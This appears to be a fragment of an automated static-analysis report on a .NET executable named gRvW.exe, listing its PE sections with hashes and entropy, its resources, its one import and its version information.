                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xbd0d00xbd200bcca7b8fbc007864ddf0cee3656f259eFalse0.9127148050231328data7.772646253601764IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xc00000x18640x1a00367c6a73ebe488b38ab65ecc8448e282False0.8149038461538461data7.2017839336384375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xc20000xc0x2009de687ebda200d0300c368ba0f4eb73fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0xc00c80x1468PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9529096477794793
                                            RT_GROUP_ICON0xc15400x14data1.05
                                            RT_VERSION0xc15640x2fcdata0.4397905759162304

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Version Infos

                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            Comments
                                            CompanyName
                                            FileDescriptionMultipleForms
                                            FileVersion3.0.0.0
                                            InternalNamegRvW.exe
                                            LegalCopyright
                                            LegalTrademarks
                                            OriginalFilenamegRvW.exe
                                            ProductNameMultipleForms
                                            ProductVersion3.0.0.0
                                            Assembly Version4.0.0.0